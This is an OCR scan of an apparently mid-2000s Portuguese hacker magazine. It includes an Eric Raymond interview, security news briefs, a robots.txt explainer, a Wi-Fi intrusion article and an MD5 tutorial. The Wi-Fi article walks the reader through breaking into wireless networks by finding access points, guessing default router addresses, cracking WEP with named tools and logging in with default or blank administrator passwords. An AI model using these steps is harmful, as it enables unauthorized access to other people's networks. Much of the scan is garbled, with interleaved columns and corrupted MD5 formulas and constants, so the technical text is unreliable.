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“ POR-ADRIANA VELOSO 


ric Steven Raymond, programador desde a 
década de 70, é uma das principais figuras do 
movimento Open Source. Tornou-se famoso 
depois que lançou o livro “A catedral e o Bazar”, 
ainda em 1997, época em que o Linux. era pou- 
co conhecido e somente um ano depois do lançamento 
do ambiente gráfico KDE. 

Conhecido por sua atuação no mundo Open Sour- 
ce, Raymond vive em Malvern, pequena cidade no 
estado da Pensilvânia. Toca flauta, bateria e guitarra, 
além de compor. Suas fortes posições políticas vão da 
defesa do porte de armas à filiação ao Partido Liber- 
tário, do semidesconhecido candidato à presidência 
dos Estados Unidos Michael Badnarik. 

Raymond apóia também o uso da criptografia 
como forma de manter a privacidade na Internet. 
Suas variadas atividades incluem textos de ficção 
científica e a prática de artes marciais. No campo 
tech, ele foi o homem que, em 1998 ,escreveu uma 
carta aberta à comunidade pedindo o fim do termo 


“free software” e a adoção de “open source”. O 
artigo, escrito pouco depois que a Netscape anun- 
ciou que seu código se tornaria aberto, descreve 
a vulnerabilidade do termo free software e como 
ele gera confusões, já que free significa tanto livre 
como gratuito. Assim, ele afirma que open source 
é mais apropriado para designar o movimento e 
a comunidade. 

Foi a partir de então que surgiu a idéia de fundar 
o Open Source Initiative (http://www. 
opensource.org). No início de 1998, 
juntamente com outros desenvolvedo- 
res , Raymond começa a iniciativa com > Gia 
o intuito de fazer com que “o mundo Ea ES 
corporativo ouvisse o que os hackers 
dizem e ensinam sobre a superioridade 
de um processo de desenvolvimento 
aberto”. No quadro de diretores tam- 
bém está Michael Tiemann, da Red 
Hat. Mas não só do lado corporativo 


este personagem hacker vive. Ele está ativo na 
briga contra a SCO, que deseja “roubar o código do 
Linux”, mas, se depender dele, “eles vão é acabar 
perderdo a patente do Unix. 

Em uma aparição clássica, no filme Revolution 
OS, Raymond se descreve como o pior pesadelo 
de Craig Mundie, braço direito de Bill Gates. De 
fato, não tem sido só a Microsoft que tem dor de 
cabeça por conta de suas afirmações, artigos e 
mensagens. Raymond também é responsável pela 
pressão pela abertura do código do Solaris, sistema 
operacional da Sun, assim como do Java. Em sua 
“Carta aberta à Sun: Libere o Java”, ele responde 
a Scott McNealy, diretor da empresa, que afirmou 
ser amigo do “modelo Open Source”. 

Mesmo sem nunca ter tido aula nem de desenvol- 
vimento de software ou de ciência da computação, 
é expertem C, Phyton e LISP, tendo escrito vários 
softwares como o nolan (chat político), o Ski (jogo 
para Linux), entre outros, além de, claro, colaborar 


em outros projetos como o Emacs (editor de texto). H4ck3r: Qual foi seu primeiro computador? 
Raymond parece estar sempre um passo à frente. Seja com ER: Meu primeiro computador foi um Osborne 1, uma 
seus livros — como, por exemplo, o 'Dicionário Hacker” que | máquina Z80 de 1981 que está esquecida hoje em dia. 
explica boa parte dos termos utilizados por programadores | Eletinha uma tela absurdamente peguena, até porque 
que falam inglês -, em seus-artigos e até em sua música. | era teoricamente portátil, já que tinha uma alça na 


Para conferir o que ele pensa e o que está fazendo, você | parte superior, mas que era apenas um equipamento 


pode visitar seu blog: http://esr.ibiblio.org/ volumoso e enorme. 
Escrevemos um e-mail para ele pedindo uma entrevista sobre 
cultura hacker. A resposta: “estou de saco cheio de dar entrevistas H4ck3r:Você tem um herói? 
ajornalistas. Mas faça o seguinte, envie-me as perguntas e, se elas ER: Não somente um, há pessoas que me influen- 
não foram muito chatas te respondo, ok?” escreveu ele. ciaram bastante. No topo da lista provavelmente 
Bem, ele respondeu. Confira a seguir as tiradas irônicase provo- | está Robert Heinlein, que é escritor de ficção cien- 
cativas de um dos maiores gurus do movimento Open Source. tífica. 


H4ck3r: Como é seu dia-a-dia? 
ER: Minha rotina é a mesma que sempre 
foi. Pensar, modificar, escrever: repetir se 
necessário (Think, hack, write: repeat 
as necessary.) 


H4ck3r: Você escuta música 
enquanto está programando? 

ER: Sim. Gosto de escutar música 
instrumental, principalmente magos da 
guitarra como Joe Satriani e Jeff Beck. 
Mas meu gosto é bastante eclético. No 
momento estou escutando o disco “Trance 
Spirits”, do Steve Roach, e aquela percussão 
africana está balançando toda a casa. Curto 
bastante sons polirítmicos — se visitar o Brasil 
algum dia gostaria de improvisar com uma 
banda de samba. 


H4ck3r:0 que você faz além de 
Coisas tech? 

ER: Gosto muito de ler ficção científica, como 
Já deu pra notar. Também treino Wing Chun, 
ima arte marcial chinesa. Além disso, pinto 
miniaturas militares. 


H4ck3r: Qual foi a melhor coisa que 
lhe aconteceu em seu trabalho nos 
últimos anos? 

ER: Bem, meu último livro, “The 
Art Of Unix Programming” (A arte 
de programar em Unix), parece ser 


a 


6 hacker 


um sucesso de crítica e de vendas. Estou muito 
feliz com isso. 


H4ck3r: Como você 
vê o movimento Open 
Source daqui a dez 
anos? 
ER: Não tenho uma boa resposta para esta 
pergunta. Não sou nenhum profeta... 


H4ck3r: Do que você mais sente falta 
na cena hacker dos anos 70? 
ER: Não sinto falta do tempo passado em nada. 
O hardware era muito fraco, as redes eram primi- 
tivas. Na verdade, era tudo um saco... 


H4ck3r: Qual o futuro da comunidade 
hacker? 

ER: Tudo o que posso prever sobre o futuro da 
comunidade hacker é que ela vai continuar cres- 
cendo cada vez mais. 


H4ck3r: Você tem um sonho que ainda 
não se transformou em realidade? 

ER: Sim. Sou um anarquista e ainda existem 
governos :-) 


H4ck3r: Qual é o grande desafio hacker 
que ainda ninguém alcançou? 

ER: Fazer o open source prevalecer, claro! :-) Este 
é meu grande plano sinistro desde 1998, E parece 
que ele está indo muito bem, obrigado. 


H4ck3r:Alguma vez você usou seus 
conhecimentos de artes marciais para 
machucar alguém? É 

ER:Não e espero nunca ter que fazê-lo. Ainda assim é 
melhor estar preparado. Ser capaz de ganhar uma luta 
é a forma mais efetiva para não ter que brigar. 


H4ck3r:Você está escrevendo algum 
livro no momento? 

ER: Talvez publique algum de meus livros de 
ficção científica. Mas também estou pensando em 
escrever algo sobre usabilidade para programado- 
res do sistema operacional Unix. 
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O navegador Safari, criado pela 


Apple, possui um bug que permite 


roubar dados dentro de cookies, 


também conhecido como Null 


Character Cookie Stealing. 


Um alemão de codinome “Lixl- 


pixel” avisou que o Mac OS X 


tinha uma falha de segurança que 


permitia a execução de scripts 


maliciosos através dos browsers 
Internet Explorer, Mozilla e Safari. 
O patch de correção saiu três 
meses depois e a Apple classifica o 


bug como insignificante. 


Para adaptar a fé às novas tecnologias, 
foi criada a Igreja dos Tolos (www. 
shipoffools.com), uma casa de cristo 
virtual em 3D onde os internautas deve- 
riam rezar e assistir missas. Deveriam, 
pois, após uma semana, à paróquia foi 
ownada: o padre foi deletado e o tópico 
dominante era pornográfico. Agora O 
serviço foi modificado e os fiéis não 


devem permanecer calados. 


É comum falar que a linha de sistemas operacionais da Microsoft é a mais vulnerável do mundos 
: a 

Bem, ela realmente é, mas em 2004 os softwares desenvolvidos pela Apple vem se mostrado 

valorosos candidatos ao posto de, maior fabricante de falhas. 


Outro problema no player QuickTime 
foi encontrado. Desta vez, a falha 
presente no serviço Darwin Streaming 
Server permite ataques do tipo Denial 
of Service remoto. 


A empresa de segurança eEye 
descobriu que o QuickTime 6.5 e o 
iTunes 4.2.0.72 possuem uma vul- 
nerabilidade que deixa a máquina 
aberta a ataques remotos do tipo 
overwrite heap memory. 


No ínicio do mês de Março, foi detectada uma vulnerabilica- 
de do tipo undisclosed buffer overflow no serviço Mac OS 
X Server Administration. As versões do Mac OS X 10.2.8 e 
10.3.3, e do Mac OS X Server 10.0 até 10.3.3 são afetadas. 


Em mais um passo na sua 
cruzada pela dominação global, a Microsoft 
gastou um bom punhado de dólares para 
patentear o duplo clique. Mas calma, não 
precisa se sentir mal por clicar duas vezes 
para executar um programa no desktop. 
A propriedade intelectual que Bill Gates 
ownou só diz respeito aos aplicativos que 
rodam no WindowsCE, sistema operacio- 
nal presente na maioria dos PocketPCs. 
Isso apenas significa que ao pressionar 
duas vezes o botão do handheld você 
estará usando mais um tecnologia “re- 
volucionária” sob domínio de Redmond. 


STALAVISTA 


A Newsletter do Astal, 


també avista E 
mbém terá ias ta Security Group 
Ss 


El agora 


O em po 
rtuguê 
dê ês. Para 
o traduzir ou que nã É 
RE ão s, 
Presente. O Primei 
econta E 
Com notíci, 
cias c; 
Ee as que ma A 
1, entrevistas com 


aqueles 
abem 


que tem preguie 
inglês, é um gra 
está traduzido 


lerem 
números 
lo; EA ErO já 
S especialist entad, 
i adas pe- 
al Astalavi 
ista. 


a Cena hacker É 


ntém o port 


integrantes d 


di 
icas de Segurança 


Na primeira edição o 


vome 


à a nindos! 
o Nersion Ste 


Os alemães do site Tom's 
Hardware Guide fizeram a gam- 
biarra do século. Com a ajuda 
de um tubo de PVC cheio de 
nitrogênio liquido para resfriar 
a temperatura da máquina, eles 

conseguiram fazer um processa- 

dor Pentium 4 rodar a 5 GHz e 


Depois do surto do vírus Sasser, que afetou mi- 
lhares de computadores que rodam na plataforma 
Windows, a Cigital e a Fortify Software anuncia- 
ram a venda de um software que faz a busca por 
falhas de segurança. Desta forma, pretendem 
antes de uma invasão, os exploits utili- 


prever, 
zados por criadores de vírus. mesmo assim ficar com atempe- 
A idéia da parceria é implementar tecnolo- raturra de 196 graus negativos. 
gias de varredura de código-fonte da Fortify Para ver como esse overclock 
or meio de seus serviços de consultoria. - EPs 4 
Sê afirmam que chegou o tempo de “as gana sas ap E 
tomshardware.com/site/videos.O vídeo mostra o processo passo a passo, 
empresas se preocuparem em detectar os das configurações de BIOS, envenenamento da FSB, alteração do clock de 
problemas mais do ques desenvolver memória e todos os outros detalhes que resultaram em uma máquina quente, 
istem links para outros 
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Já circula pela Internet o primeiro vírus 
para plataformas de 64 bits. O W64. RU- 
GRATA, escrito em IA64 assembly, in- 
fecta arquivos executáveis (EXE, Portable 
Executable) que estão na mesma pasta Rá 
em que ele é copiado e nas sub pastas, se 
aproveitando da estrutura de Thread Local 
Storage. Sistemas baseados em plataformas 
de 32 bits não são vulneráveis ao rugrat. Porém 
os softwares desta plataforma que simulam a 
existência do chip de 64 bits podem ser infecta- 
dos. O curioso é que apenas os chips da Intel são 
afetados e que apesar da sofisticação do vírus, 


sua incidência foi baixa. Pelo jeito, poucos usuários 


O estudante inglês Michael Gunn, de 
21 anos, está processando a Universi- 
dade de Kent em Canterbury. À insti- 
tuição o expulsou por copiar textos da 
Internet e usá-los nos seus trabalhos 
sem fazer referência aos autores origi- 
nais. Depois de abusar das teclas mági- 
cas Ctrl+C e Ctrl+V, por pelo menos três 
anos, Gunn se sente injustiçado. 

Para ele, os diretores deveriam 
ter o expulsado antes: “Eles ficaram 
recebendo meu dinheiro por três anos e 
quando eu estava prestes a me formar, 
me mandaram embora”. O represetan- 
te da universidade, David Nightingale, 
disse que Gunn foi avisado e o inocente 
estudante rebateu dizendo:”Nunca 
pensei que isso fosse um problema”. 


Nos EUA, sobra gente moralista que se 
ofende por ouvir palavrões na televisão. Nos 
EUA, também sobra gente que se aproveita 
de paranóias desse tipo para ganhar dinheiro. 
Por isso, os interessados em investir Us$ 79 
para trocar as escrotices faladas em filmes 
por bips, no melhor estilo The Osbournes, 
agora pode comprar o ClearPlay. O aparelho é 
capaz de eliminar cenas violentas ou eróticas 
de filmes em DVD. Seu fabricante garante 
que o conteúdo não é modificado. Apenas as 


partes mais picantes e violentas são omitidas. 
Assim a criançada pode se divirtir sem que 
seus pais estejam preocupados. Eles só não 
explicam como Pulp Fiction, South Park, 
Clube da Luta e outras pérolas ficam depois 
dessa mutilação do cH”%o$lho. 
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odo mundo usa engines de busca. Mas você sabe 
: como essas engines escolhem as páginas que serão 
listadas? Você já deve ter escutado histórias a respeito 
de páginas pessoais que foram inclusas numa lista, 
quando, na verdade, não deveriam ter sido. Como im- 
pedir que essas engines vasculhem suas informações pessoais? 

Bem, emvezde explicarmos porque nunca deveríamos armazenar 
informações pessoais em um web site público e acessível, vamos 
falar a respeito de como as engines de busca trabalham. 

A World Wide Web foi denominada assim devido ao clichê de 
que todas as páginas são linkadas uma a uma, como uma teia de 
aranha. Uma engine de busca começa se focando em uma página 
e persegue todos os seus links até reunir todas as informações no 

| seu Banco de Dados. Ele então percorre links off-line e continua 
fazendo o mesmo com todos os sites que estão linkados com 
o original, tudo a uma velocidade surpreendentemente rápida. 
Devido à sua automação, ele écapaz de criar e atualizar sua base 
de dados rapidamente. Essa automação é similar a de um robot, 
ao repetir o mesmo trabalho várias vezes. O programa ou engine 
que faz o trabalho de rastrear a World Wide Web é denominado 
+ “agente”, “spider”, ou o termo mais comum, “robot”. 

Isso é um bom negócio? Provavelmente. Há várias razões 
para se utilizar robots. Obviamente, é muito útil ter engines de 
busca para encontrar o que queremos no vasto mundo online. 
Algumas vezes, é difícil até mesmo encontrar documentos em 
seu próprio site! O uso dos robots não é apenas para sair por 
aí coletando dados, mas também personalizar e customizar a 
sua homepage. Um site pode comportar centenas e centenas 
de páginas, às vezes mais. É muito difícil encontrar e manter 
documentos em uma estrutura assim, Um robot pode fazer 
esse trabalho para você, reportando-se a links quebrados e 
ajudando a consertar falhas e erros em seus sites. 

“Isso é ótimo, eu quero um desses!” Bem, antes que você mergulhe 
nessa, pense com calma. Há muitos obstáculos para utilizar um spicler. 
Primeiramente, você tem que escrever a engine do spider de forma 

| corretaafim denão sobrecarregar seu servidor. Eletambém precisaser 
& | inteligenteo suficiente para não rastrear sites de outras pessoas enem 
| sobrecarregar o servidor deles. Se todo mundo possui um agente que 
jo vasculha oslinks de qualquer pessoa, a web reduziria sua velocidade até 
>” parar. O problema mais importante, no entanto, é o que mencionei no 
início, Os spiders vão, uir links de qualquer página. Isso significa 
a) ocê tadn u link para um e-mail pessoal, de repente ele não 
Ee “émalé pessoal. Isso nos leva a uma grande questão relacionada 
- aprivacidade É legalidade. Nunca coloque nada na Internet o 
vv que você nãoyqueira que as pessoas vejam. Esse é um conselho 
= 2º comum [o] udtê deve seguir, independente se estamos falando 
* sobrespiders. Você já deve ter lido histórias de companhias cujos 
arquivos ternos foram encontrados de repente em circulação 
na Internêt. Culpa dos hackers? Talvez você possa culpar os 


| 


/ 


robots e administradores que não sabem como controlá-los. 
Tudo que eles fazem é iniciar o robot por um site e rastrear 
quaisquer links programados para isso. Alguns empregados 
podem se linkar a documentos internos. Algumas bases de 
dados podem permitir aos spiders examiná-los. Você nunca 
sabe quem estará se linkando com o quê e se você não tiver um 
web site bem construído, correrá o sério risco de compartilhar 
aquele seu projeto secreto com o restante do mundo. 

Como você pode ver, há alguns prós e contras. Por sorte, há 
formas de controlar robots e, com esperança, limitar o lado ruim 
da coisa. Há um padrão chamado de arquivo de exclusão “robots. 
txt”. Trata-se de um simples arquivo de texto ASCII, que permite 
informar a qualquer robot que visite seu site o que eles podem e 
não podem acessar. Aqui está um arquivo exemplo: 


if 

itrobots.txt file for http://www.StankDawg. 

com/ 

E 

iflast updated: 09/06/2003 by: StankDawg 

/á Es 
EWTF RU Doing here? RU A ROBOT? 

RU À SPIDER? RU 31337? 


E 

User-agent: * 
Disallow: /incoming/ 
Disallow: /downloads/ 
Disallow: /webstat/ 
Disallow: /pub/ 


User-agent: Hackers-go-away 
Disallow: /TOpS3cr3t/ 


User-agent: they-will-never-find-this-one 
Disallow: /hIldd3n/ 


Você notará que há comentários (que começam com o sinal 
“3 e dois outros importantes campos. Possivelmente, o uso 
desses campos pode limitar a maioria dos engines de busca 
e spiders referentes a um arquivo de exclusão. 

O primeiro campo é chamado de string “User-agent”. Cada 
programa ou pessoa que visita seu web site, utiliza um pedaço 
de software. Quando é uma ação humana, é convocado um 
browser como o Mozilla, Firebird, Konqueror ou dezenas de 
outros. O nome deste agente é enviado com toda requisição, 
de página. Se você procura por alguns arquivos de log d 
seu servidor de Web, poderá ver quem visitou o seu site e 
que agente foi usado. A maioria deles é do Internet Explorer, 


se a maioria dos internautas utilizar o sistema operacional 
Windows. Você pode conferir seus logs e encontrar alguns 
tipos interessantes de clientes fora dali. 


Bem, a partir do momento que os robots também são 
programas, eles também contam com um string agente. 
No arquivo robots.txt (que deve rearranjar no diretório raiz 
de seu home Server de Web), você pode escolher qualquer 
agente para bloqueá-lo. 

O segundo campo é o arquivo ou diretório real que 
você não quer que seja acessado. O campo de nome que 
você deveria usar é “disallow”. Tanto o “user-agent” 
como o “disallow” devem ser seguidos por um: “e os 
dados que especificam o que você quer que seja feito”. 
Se você quer impedir o agente chamado “googlebot” 
de acessar o arquivo chamado “privatestuff.html”, você 
deve codificar as seguintes linhas: 


iithis is a comment above the sample code. 
te 

User-agent: googlebot 

Disallow: privatestuff.html 

Disallow: /images/mysexpics/ 


Como pode-se ver, a sintaxe é muito simples. O que você preci- 
sa fazer é avaliar o que será escondido daqueles agentes. Se você 
quer esconder vários arquivos ou diretórios diferentes, deverá 
fazer uso de múltiplas linhas “Disallow”. No exemplo abaixo, eu 
também bloqueei o acesso ao diretório inteiro chamado “/ima- 
ges/mysexypics”, o que seria bastante constrangedor. 

Tome cuidado, pois ele somente bloqueia um agente! Ge- 
ralmente as pessoas não distinguem um agente de outro em 
uma aplicação prática. Se algo será mantido oculto, ele deve 
ser escondido de todos os agentes, não apenas o “googlebot” 
como no exemplo acima. 

Uma forma de fazer isso é usar strings múltiplos “user- 
agent”. Este nunca está totalmente completo e sempre há 
novos spiders em ação e que não fazem parte da sua lista, a 
menos que você faça uma atualização constante. A melhor 
forma de proceder é simplesmente utilizar um wildcard de “*”, 
que relata a todos os agentes para seguirem os subsegientes 
comandos “Disallow”. 

Ao longo das mesmas linhas, você pode também 
informar aos robots para ignorarem seu site inteiro 
usando o string “disallow” de “/” que interromperá 
o robot de rastrear qualquer coisa! (Note que você 
não pode usar um wildcard “*” no campo Disallow; é 


preciso especificar um caminho). 


dé This is a global “stop all robots” example 

Fá 

ifNote that comments can be put anywhere 

it0n a line, and not just above the fields. 

ifThey can come after the string. 

f 

User-agent: * dl This sLring stops ALL robots from 
giong into... 


Uma alternativa para usar o arquivo robots.txt é adotar 
as meta tags especiais em sua HTML. Há a possibilidade de 
algumas pessoas não conseguirem criar um arquivo robots. 
txt por uma razão ou outra. Você também pode adicionar 
uma meta tag no HTML de toda página que for codificada. 
O nome do meta tag é simplesmente “robots”. Este meta tag 
habilitará ou desabilitará robots usando palavras-chave na 
meta tag, assim como “all” (tudo) permite que seja incluso 
na engine de busca ou “none” (nenhum) para impedi-lo de 
ser adicionado. Tamhém existem outras opções, mas essas 
são suficientes para a maioria dos usuários. 

Pois justamente aqui está a pegadinha (há sempre uma 
pegadinha). A palavra-chave é “honor”; que eu já havia men- 
cionado antes. Enquanto a maioria das engines comerciais de 
busca obedece ao seu arquivo robots.txt, o que eles fazem 
não é um pré-requisito. 

Trata-se de um padrão opcional que não é exigido por 
nenhum agente. Certo, estamos em um sistema “honrado”. 
Tenho certeza que chegará o dia em que a competição de engi- 
nes de busca se tornará tão acirrada que as engines começarão 
a indexar todas as páginas, independente de requisições de 
exclusão, portanto eles vão ganhar em vantagem em relação 
a outras engines de busca. 

Além disso, você tem que perceber que qualquer um pode 
escrever um spider ou um robot! Desde que é opcional 
“honrar” ou não suas requisições de exclusão, eles ainda 
se moverão através de seu site e ignorar todos os avisos de 
“não entre”. Essa é a razão que eu mencionei antes, pela qual 
você nunca deve colocar informações pessoais, privadas ou 
valiosas em um local acessível e público. 

Finalmente, você deve perceber isso somente porque supo- 
mos que eles são robots (ou programas), o que não significa 
que as pessoas não podem fazer o mesmo. 

Eu encontrei muitos, muitos backdoors e entradas “ocultas” 
simplesmente olhando os arquivos robots.txt dos sites. Você 
tem total permissão para pegar meus arquivos robots.txt e 
talvez até encontrará algo interessante e supersecreto ! : 


Por outro lado, Linksys usa 192.168111 e Netgear usa 192/168.011. 
| Seo IP padrão não é o do AP, então você pode usar um sniffer para 


! capturar pacotes vindos do sinal Wi-Fi. 


| 
lr Uma vez que você tenha ganhado o IP e habilitado uma conexão 
4 


1 associada para o AP, é hora de se conectar em qualquer ponto. 


Mesmo que você tenha uma conexão, o WEP vai fazer com que 


Vi 
y A ; 
| | você volte atrás. 


O WEP é uma encriptação usada para redes wireless fixadas em 
um padrão IEEE para 802.]la/b. Quando eles fizeram esse padrão, 


não pensaram no que poderia ser feito para craqueá-lo. 


A todo minuto, uma pequena quantidade de transmissões WEP 


são enviadas por meio da rede. Cada quadro de transmissão é o 


mesmo, permitindo que esses quadros sejam capturados facilmente 


e decriptados sem se preocupar com a mudança do pacote. Com 
as ferramentas de WEP como WEPCrack, AirSnort e BSD-Airtools 
Dweputils, craquear um dump de WEP leva poucos minutos. Algu- 
mas chaves de 104-bits (128 bits) duram 36 horas, dependendo da 
velocidade do sistema. 
POR Mas logar seus hits ou usar um GPS pode mostrar onde aquela 
j rede estava quando você a encontrou pela primeira vez, então você 
onforme os preços vão baixando, o wireless se torna mais pode voltar antes de quebrar a chave. 


e mais comum. Enquanto a maioria das pessoas ignora Uma vez que tudo isso foi feito, a rede está sob seu controle. À 
as vulnerabilidades que o Wi-Fi leva em conta, trata-se de partir daqui, você não precisa se preocupar com o-roteador blo- Ko 
uma forma mais fácil de invadir a rede. Mesmo configuran- queando seu sistema e algumas vezes, recebendo um ou dois logs 
do as chaves WEP, não é possível evitar que um hacker comprometa SNMP. Se você já sabe a senha padrão para o AP, pode usá-lo. Se 
o Wi-Fi AP (access point) ou roteador. você não conhece os padrões para dispositivos Wi-Fi, vá para o site 
Muitas ferramentas estão disponíveis para vários sistemas opera- do fabricante e procure sua documentação. 
cionais. O NetStumbler para Windows, MacStumbler para MacOS, Outra forma é usar o serviço de terminal como Remote Desktop 
Welenreiter para Linux e BSD-Airtools para Free/Open/NetBSD são para Windows ou rdesktop para Linux/UNIX para conectar um 
stumblers de rede Wi-Fi que ajudam a encontrar APs. desktop do Windows. Lembre-se de que a maioria das pessoas 
A maioria dessas aplicações pode usar um GPS para mapear os não configura uma senha para a conta Admin ou Administrator no 
] pontos de acesso detectados enquanto ocorre o escaneamento. Windows. Você pode usar o browser local e ver se os cookies foram 
| Essas ferramentas de stumbling tornam o hacking de wireless uma usados no passado para se logar no AP. 
| ameaça. Usá-las é bastante simples. Cada um detectará os APs de Estes métodos particulares estão pouco a pouco se tornando, 
«Sinais desviados, transmissões WEP, canal, comprimento do sinal obsoletos. Enquanto isso, o Wi-Fi Protected Access (WPA) fornece 
| e endereço MAC. ELEs padem determinar o fabricante pelo ende- uma melhor autenticação e interrompe a repetição do quadro dos 
1 reço MAC, no entanto, algumas entradas podem ser identificadas pacotes de encriptação. 


erroneamente. Muitos dispositivos wireless estão agora começando a contar 
|“ Uma forma de encontrar o fabricante correto pelo endereço MAC com a opção de desativar a transmissão de sinal e impedir que os 
|! pode ser visto na página http://standards.ieee.org/regauth/ sinais sejam “stumbled”. Isso não significa que o link mais fraco 
| | oui/oui.txt. de qualquer rede esteja se tornando mais inteligente . No entanto, 
I Todo endereço MAC e o fabricante são listados. Isso nos leva à se você planeja assegurar a integridade da sua rede WiFi, os sinais 


outra chave para entrar na rede. Algumas:vezes, você pode entrar sempre serão monitorados. 


| pricr disponível. Neste caso, há algumas formas de obter o en- 


| na rede facilmente usando DHCP, mas nem todas as redes têm 
| 
| 


| dereço do AP. Esses artigos são traduções 
| dispositivo wireless está configurado. Por instância, os roteadores D- do 2600, o mais tradicional 


||t À primeira forma de adquirir o IP é usar o IP padrão para o qual o autorizadas de artigos ori 
ph 


Ni Link usam o 192168.0.1e seus pontos de acesso usam 192.168.0.50. Ê depois cio ridogmundos 
N 
| 
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EP SE a ADD Dna PR 
PROGRAMAÇÃO — 


pau Rs 

GARANTÃA INTEGRIDADE EA - : 
SEGURANÇA DOS SEUS ARQUIVOS ag - 

lariamente enviamos, recebemos e acessamos remota- » 

mente diversos tipos de dados online. Com informações ê 

emjogo, vale o clichê: segurança é fundamental. Nesse À 1 q L 

artigo, falaremos do md5sum, ferramenta que permite- M474R o E 

saber setais dados foram manipulados sem autorização. p 
Vejamos quala lógica do padrão: quando aplicado em um arquivo digital, 
como por exemplo, um banco de dados armazenado em um servidor, 
ele gera uma string de 128 bits associado. Assim, temos uma função 
injetora, ou seja, a string gerada é única. Para mensagens diferentes, 
são gerados strings diferentes. 

Isso significa que se o nosso arquivo com o md5Ssum aplicado for 
modificado, basta recalcular o md5sum e comparar com a string ante- 
rior, Se elas não forem idênticas, abra os olhos. Certamente, o arquivo 
sofreu alguma alteração. 

Outra aplicação da ferramenta seria verificar a integridade de um 
arquivo. Tomemos como exemplo um software desenvolvido por 
você: e colocado para download. O md é calculado na origem, e para 
acompanhar e garantir que o arquivo baixado não foi alterado, basta 
recalcular no destino. Se os resultados forem iguais, então o arquivo foi 
preservado durante a transmissão. É a garantia cle integridade para seu 
cliente. Vamos demonstrar agora o md5sum em ação. Escrevenosum 


texto (nomeado como teste.txt) com a frase inicial “O que é a vida?” e 
usando os comandos a seguir: 


md5sum teste.txt > teste.txt md5.asc 
more teste.txt md5.asc 


6 hacker 


A seguir, há uma segunda linha: “Uma 
experiência inacabada...”. Assim, repeti- 
mos o procedimento; 


mdSsum' teste.txt > teste. 
txt new -md5.asc 
more teste.txt. new md5.asc... 
506c69ffe9bad03373070fc08654 
455e teste.txt 


Vemos claramente que são strings 

diferentes, o que reflete a alteração no ar- 

“Ato: Vamos agora verificar o algoritmo 
propriamente dito. 

Bud a a 
AMATEMÁTICA ASSOCIADA 
Seguindo os passos do criador do algoritmo, 

uma “palavra” é uma quantidade de 32 bits e 

um “byte” possui 8 bits. A seguência de hits 

será interpretada da seguirite imaneira: cada 
grupo consecutivo de 8 bits é interpretado 
como tm byte, sendo que o bit mais signifi- 
cativo ( o “mais alto”) é listado em primeiro 
lugar. Denotaremos xi indicando “x-com-o 

subíndice i”. 

Nocaso de uma expressão, o subíndice será 
denotado por x (1x1). De forma análoga, no 
caso de superíndice, temos xi. 

Antes de falarmos sobre'o algoritmo, é 
preciso rever certos conceitos: 


)) Aritmética em: Zn: no conjunto dos 
números inteiros Z, identificamos dois. 
elementos: xe y. Se ambos resultam no 
mesmo-resto quando divididos porn; 
isso define uma relação de equivalência 
R'sobre Z. O conjunto quociente Z/R é 
chamado de inteiros módulo n ou sim- 
plesmente Zn (também conhecido como 
aritmética módulo n). 


2) Shift circular numa sequência de bits: 
dada uma seguência x. O....x..n de bits, 
umshift circular para a direita é dado por 
x nx O....x (n-1. Repetindoo processo, 
temos agorax. (n-1)x nx. 0....x (n-2) 
é assim sucessivamente. Esse procedi- 
mento é usado para um shift à esquerda. 


2) Operadores lógicos em variáveis boo- 
leanas: dada a álgebra de Boole 
B=((0,1), v,*, not), temos as seguin- 


- tes tabelas-verdade: 


XY N PARADO (a x not 
000 (ER UM VAO 
(oe tb 0.10 1 0 
0d 1:00 
E Rca REL 


Dentro desse contexto, o símbolo + 
denota adição de duas: palavras-módulo 
2:32; X<« s éum valor de 32 bits obtido 
pela permutação circular à esquerda pors. 
posições de bits. Já um XOR é dado por 
X(A,B) = not(AJB + Anot(B). 

Note que, para simplificar as expres- 
sões, usamos a justaposição em vez de 
*, Isso no caso do produto booleano. No: 
caso específico de Lima segiiência de bits, 
as operações lógicas serão realizadas bit 
a bit. Por exemplo, se você tem duas pa- 
lavras X e Y, XY significa fazer o produto. 
booleano para cada par de bits associado, 
mais concretamente: 


(1100111)(1000001) = 1000001. 


POR DENTRO DO ALGORITMO 

Suponha que temos uma mensagem de 
k-bits de comprimento (um número inteiro 
não negativo) e que queremos calcular 
o seu md5. De forma simbólica, vamos 
denotar a seguência da seguinte maneira: 
x 0x 1...x (k-1). O algoritmo do mds 
consiste em cinco passos: 


321 Adição de bits de complemento 

ÁAvmensagem é estendida até que seu 
comprimento (em bits) fique congruente 
a 448, módulo 512, ou seja, até que ela 
fique apenas a 64 bits para se tornar um 
múltiplo de 512. O processo de extensão é 
o seguinte: “1” é adicionado a mensagem 
e, então, bits “0” são adicionados de 
forma que o comprimento final em bits 
da mensagem seja congruente. 


232 Adicionar comprimento 

Dada à mensagem origihal (antes do pri- 
meiro passo), sua representação b de 64 
bits é adicionada ao resultado obtido no 
passo 1. Caso o b seja maior do que 2-64, 
apenas os 64 bits menos significativos de 
b são usados. Neste passo, a mensagem 
resultante possui um comprimento que é 
um múltiplo exato de 512 bitse, de forma 
equivalente, possui um “comprimento 
que é um múltiplo exato de 16 ( 32-bif) 
palavras. Denotaremos por MIO...N=1] as 
palavras resultantes deste processo, no 
qual Né um múltiplo de 16: 


2>3 Inicializar o buffer MD 

Um buffer de quatro palavras (A, B, C, 
DJ é usado para computar o maS. As letras 
ABC e Dsão registradores de 32 bits, 
sendo que eles são inicializados com os 
seguinte valores em hexadecimal: 


palavra À: 01:23: 45:67 
palavra B.: 89 ab” cd ef 
patavra GC: fede ba 98 
palavra D: 76. 54:32:10 


2) 4 Processar a mensagem em blo- 
cos de 16 palavras 

Em primeiro lugar, são definidas quatro 
funções auxiliares. Cada uma recebe três 
palavras de 32 bits e devolve (retorna) 
uma palavra de 52 bits.-As funções são 
definidas a seguir: 


E(X,L,Z) =/XY v not(Xx)Z 
G(X,Y,7) = XZ.v not(z) 
H(X,Y,2) =X xor-Y.xor: Z Re 
TX, Z) 7 = Yoxor (Xv nat (2)) 


eh 


À 


NAÇÃO 


PROGR 


” 


Devemos frisar que as operações são adehlSiaeto folga WE: MONS) RS o STO 9 26] [CDAB 3 14 27] [BC 
realizadas bit a bit (cada bit é considera-  MorlgcRATEToNi Doi dao] SRTA 8 20 28] 
do independente dos outros!). Ou seja, [ABCD 13 5 29] [DABC 2 
todas as palavras das entradas são de- /* Round 1. */ MM 930] [CDAB 7 14 31] [BCDA 
compostas em segiiências binárias e as /* Let [abcd k s i] denote 12 20 32] 
operações são realizadas componente À Einal=Não eia- tato 
por componente. Um exemplo: a-b+((a+F(b,c,d) VE Rod E3 = A 
